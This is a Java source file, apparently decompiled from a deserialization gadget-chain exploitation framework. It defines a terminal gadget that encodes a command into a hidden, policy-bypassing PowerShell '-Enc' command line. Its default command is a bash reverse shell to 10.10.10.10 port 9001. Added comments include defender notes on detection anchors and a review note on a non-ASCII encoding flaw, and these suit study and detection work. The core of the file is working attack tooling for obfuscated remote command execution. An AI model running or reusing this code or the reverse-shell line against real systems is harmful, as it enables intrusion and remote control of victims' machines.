package com.ar3h.chains.gadget.impl.common.other;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Base64;

/**
 * Terminal "gadget" that wraps a command string into a {@code powershell.exe}
 * command line carrying the command as a Base64 {@code -Enc} argument.
 *
 * <p>The annotation texts below are runtime metadata and are kept verbatim; in
 * English they read roughly "Java PowerShell command-execution handling" and
 * "handles problems running certain commands through Runtime exec".
 *
 * <p>Defender notes: the emitted prefix
 * {@code powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc} is a fixed string
 * (abbreviations of -NonInteractive, -WindowStyle Hidden, -NoProfile,
 * -ExecutionPolicy Bypass and -EncodedCommand). It appears unchanged in
 * process-creation command-line telemetry, and the Base64 blob that follows
 * decodes as UTF-16LE text, so both are usable as detection and triage anchors.
 * PowerShell script block logging records the decoded script as well.
 */
@GadgetAnnotation(name = "Java Powershell 执行命令处理", description = "处理 Runtime Exec 执行某些命令的问题")
@GadgetTags(tags = {Tag.Other, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/other/JavaRunCmdPs.class */
public class JavaRunCmdPs implements Gadget {

    // Command text to wrap. Public and mutable; presumably populated by the
    // framework through @Param - verify against the caller. The default is a
    // sample value and is wrapped verbatim like any other input.
    @Param(name = "命令", description = "执行命令内容", requires = true)
    public String cmd = "sh -i >& /dev/tcp/10.10.10.10/9001 0>&1";

    /**
     * Builds the {@code powershell.exe ... -Enc <base64>} command line for {@code str}.
     *
     * <p>Each Java {@code char} is written as its UTF-8 bytes followed by one zero
     * byte, and the resulting byte sequence is Base64-encoded. For ASCII input this
     * is byte-for-byte the UTF-16LE encoding that {@code -EncodedCommand} decodes.
     *
     * <p>NOTE(review): for characters outside ASCII, "UTF-8 bytes + 0x00" is not
     * UTF-16LE, so such input does not round-trip; anyone decoding a captured blob
     * produced here should expect garbled text at those positions.
     *
     * @param str command text to encode; a {@code null} value raises
     *            {@link NullPointerException}
     * @return the fixed prefix followed by the Base64 text
     */
    public static String getPowershellCommand(String str) {
        ArrayList<Byte> encoded = new ArrayList<>();
        final int length = str.length();
        for (int idx = 0; idx < length; idx++) {
            // Encode one UTF-16 code unit at a time, exactly as the original does.
            byte[] utf8 = String.valueOf(str.charAt(idx)).getBytes(StandardCharsets.UTF_8);
            for (byte unit : utf8) {
                encoded.add(unit);
            }
            // Trailing zero: the high byte of a UTF-16LE code unit for ASCII input.
            encoded.add((byte) 0);
        }

        // Unbox into the primitive array the Base64 encoder needs.
        byte[] raw = new byte[encoded.size()];
        int pos = 0;
        for (Byte boxed : encoded) {
            raw[pos++] = boxed;
        }

        String base64 = Base64.getEncoder().encodeToString(raw);
        return "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc " + base64;
    }

    /**
     * Returns the wrapped form of {@link #cmd}; neither argument is read.
     *
     * @param gadgetContext unused here
     * @param gadgetChain unused here
     * @return the command line produced by {@link #getPowershellCommand(String)}
     * @throws Exception declared by the {@code Gadget} interface
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        String wrapped = getPowershellCommand(this.cmd);
        return wrapped;
    }
}
